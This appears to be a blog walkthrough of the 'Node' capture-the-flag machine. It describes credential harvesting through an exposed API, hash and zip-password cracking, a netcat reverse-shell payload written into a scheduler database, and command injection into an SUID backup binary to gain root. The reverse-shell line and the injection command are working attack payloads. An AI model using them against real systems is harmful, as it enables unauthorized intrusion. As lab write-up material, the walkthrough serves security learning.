Node: 1 | Vulnhub Walkthrough

Dot Dot Slash
Aug 24, 2018 · 6 min read

Node is a vulnerable machine, originally created for HackTheBox platform, designed by Rob Carr. Node has several privilege escalation paths and is more of a CTF style machine.

Level: Intermediate

Arp-scan or netdiscover can be used to discover the leased IP address.

Figure: Discover target IP address using arp-scan

Port scans using nmap revealed a web application running on port 3000 and an SSH service. The website running on the target made no sense to me. I wasn’t able to figure out why this application existed in the first place. Nevertheless, there was a login page in the application.

Figure: Detailed nmap scan
Figure: Main site

Enumeration and Initial Foothold

Figure: Check source code for hints
Figure: API call exposing user credentials
Figure: Detecting hash type as SHA-256
Figure: Cracked two hashes online
Figure: Logged into the application as tom

However, there was nothing of interest in the application from the context of a standard user. On checking the response from the API, we can be assured that none of the compromised users were admins.

On further enumeration, I was able to discover another API call to /api/users, and with it an additional hash, belonging to an admin user. Using the same online tool, I cracked it.

Figure: Hash discovered for admin account
Figure: Cracked the hash
Figure: Logged in as admin user

Admin login allowed me to download some sort of backup which was 3MB+ in size. At first the downloaded file didn’t make much sense to me. It looked like base64 data on checking the contents. The decoded file was a zip archive which required a password for extraction. I used fcrackzip along with rockyou.txt word-list in Kali to discover the password. On unzipping the archive, I got the backup of the web application.

Figure: Decode and extract zip file
Figure: Crack the zip password using fcrackzip
Figure: Extract the zip archive to retrieve the backup files

From the extracted files, I got the MongoDB connection string, which had the password for the mark user. I tried to SSH using the same credentials. However, there was no user hash present in mark’s home folder.

Figure: Password for mark
Figure: SSH access as mark

Expressway to Root

Figure: Enumerating the box
Figure: Rooted using kernel exploit

More Enumeration and an Insecure Scheduler

Figure: Another Node.JS application on the box
Figure: JavaScript code of the scheduler app

So the scheduler app is connecting to the scheduler database using mark’s credentials. In a nutshell, the application periodically connects to the database to retrieve the ‘cmd’ value from the ‘tasks’ collection. The ‘cmd’ value is executed using the exec function and the document is then removed from the database. So all we need to do is write our payload into the tasks collection in the DB. I wrote the reverse shell payload using netcat (nc had no -e support).

I got access as tom and the user hash was present in his home folder. e1156acc3574e04b06908ecf76be91b1

rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 192.168.56.102 443 >/tmp/f
Figure: Write the reverse shell payload to DB
Figure: Reverse shell as tom

Custom Backup Function

So the syntax required (check the source code for clarity) for invoking the backup binary is /usr/local/bin/backup -q <backup_key> <directory_to_backup>.

Figure: Backup key hard coded in the application
Figure: Portion of code invoking the backup binary
Figure: SUID bit set for backup binary

Trying to back up the /root or /etc folders returns ASCII art instead of a backup. So I performed a strings analysis on the binary for clarity. With the strings output in hand, I can explain how the backup binary works.

  1. First it checks for a valid access token.
  2. For the locations /root and /etc it has a hardcoded base64 output.
  3. If the location is not /etc or /root, it creates a temporary file in the /tmp folder.
  4. Then the given location is zipped using the following command: /usr/bin/zip -r -P magicword %s %s > /dev/null. One of the %s placeholders receives the directory we passed as input to the backup binary. All output is redirected to /dev/null.
  5. The archive file is then base64 encoded and printed to the terminal.
Figure: String analysis on the backup binary using strings command

Now this looks like a typical command injection scenario, but a very tricky one. I needed to get around the /dev/null redirection, which discards all output. If I could pass a command to the backup binary in quotes, it would be inserted into the internal command string without being executed immediately.

I used a newline character to get around the /dev/null hurdle. The newline breaks the single command into three commands. The third command, ls >/dev/null, only executes after /bin/bash exits, so the redirection no longer applies to the shell.

/usr/local/bin/backup -q 45fac180e9eee72f4fd2d9386ea7033e52b7c740afc3d98a8d0230167104d474 /s"$(echo 'dds\n/bin/bash\nls')"
Figure: Root access through command injection

The root flag can be read from the /root folder. 1722e99ca5f353b362556a62bd5e6be0

Well, that was a hard root to come by. Node was a great machine. Yet another CTF style machine but I loved the privilege escalation path.

egghunter

My experiments on Vulnhub
